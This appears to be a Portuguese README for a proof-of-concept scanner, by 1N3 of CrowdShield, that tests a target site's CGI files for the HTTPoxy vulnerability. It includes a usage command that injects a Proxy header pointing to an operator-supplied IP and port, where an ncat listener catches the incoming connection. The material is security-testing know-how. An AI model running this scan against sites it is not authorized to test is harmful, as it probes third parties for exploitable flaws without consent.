
Scanner de Exploração HTTPoxy por 1N3 @CrowdShield
por 1N3 @CrowdShield (https://crowdshield.com) Última atualização: 20160720
Scanner PoC/Exploit para escanear arquivos CGI comuns em uma URL alvo pela vulnerabilidade HTTPoxy. Httpoxy é um conjunto de vulnerabilidades que afetam código de aplicação executado em CGI, ou ambientes similar ao CGI. Para mais detalhes, acesse https://httpoxy.org.
Requer ncat para estabelecer sessão reversa
./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
Isso escaneará https://target.com com uma lista de arquivos CGI comuns enquanto injeta um cabeçalho Proxy de volta para um IP:PORT fornecido. Um ouvinte reverso capturará a conexão de entrada para confirmar que o site remoto está vulnerável.
Não assumo nenhuma responsabilidade por uso indevido ou incorreto deste exploit.